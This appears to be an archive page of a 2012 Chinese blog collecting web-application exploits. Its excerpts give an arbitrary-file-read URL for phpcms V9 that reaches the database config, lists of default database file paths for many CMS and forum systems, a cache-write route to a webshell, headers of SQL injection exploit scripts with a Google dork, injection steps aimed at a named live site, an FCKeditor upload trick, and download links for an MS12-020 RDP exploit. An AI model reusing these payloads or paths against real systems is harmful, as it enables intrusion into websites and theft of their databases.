本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 漏洞收集

DedeEIMS v1.1 暴后台路径

2012.08.8 , , 1 Comment ,

\include\dialog\config.php //检验用户登录状态 $cuserLogin = new userLogin(); if($cuserLogin->getUserID()==-1) { if($cuserLogin->adminDir=='') { exit('Request Error!'); } ...

大量网站系统(CMS,BBS)默认数据库路径和密码公布

2012.08.8 , , No Comments ,

网站默认数据库及账号密码 /data/dvbbs7.mdb 动网论坛数据库 /databackup/dvbbs7.mdb 动网论坛数据库 /bbs/databackup/dvbbs7.mdb 动网论坛数据库 /admin/data/qcdn_news.mdb 青创文章管理系统数据库 /data/qcdn_news.mdb 青创文章管理系统数据库 /firend.mdb...

phpcms V9最新任意读文件漏洞 [转]

2012.07.24 , , No Comments ,

漏洞利用代码: /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q =../../phpsso_server/caches/configs/database.php database.php为数据库配置文件

simple-log后台写入缓存漏洞和全局文件读取漏洞[转]

2012.05.29 , , No Comments ,

一、写缓存拿webshell /home/cache/sl_config.php这个文件里面记录的是博客设置的缓存数据 a:16:{s:9:"blog_desc";s:4:"test";s:12:"blog_keyword";s:0:"";s:9:"blog_name"...

Supernews 2.6.1 sql注入漏洞

2012.05.23 , , No Comments ,

1.<?php 2.# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞 3.# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados" 4.# Version: 2.6.1 5.# Te...

飞飞影视SQL injection exploit[转]

2012.05.22 , , No Comments ,

< ? php /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * keyword “Powered by www.ff84.com” */ error_reporting(E_ERROR); set_time_lim...

织梦CMS5.7注入加上传漏洞

2012.05.12 , , 1 Comment ,

爆路径:data/mysql_error_trace.inc ①注入漏洞。 这站 http://www.30tianlong.com/ 首先访问“/data/admin/ver.txt”页面获取系统最后升级时间, 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。 ...

Fckeditor上传文件被删除时本地构造TEST.HTML上传

2012.05.8 , , No Comments ,

好多站长们多把TEST.HTML给删了。可是上传的 文件没删。这样的话可以自己在构造一个。 把以下代码保存成TEST.HTML就行了。然后修改里面的上传文件。 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html xmlns="...

MS12-027 MSCOMCTL ActiveX Buffer Overflow

2012.04.26 , , No Comments ,

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on ...

ms12-020 RDP远程漏洞

2012.03.15 , , No Comments ,

要用到freerdp模块 下载地址:https://github.com/FreeRDP/FreeRDP/downloads EXP下载:http://www.i0day.com//gjb/ms12-020.txt windows下蓝屏版,测试windows2003有效果,xp没什么效果 下载地址:http://115.com/file/ansmvsf0#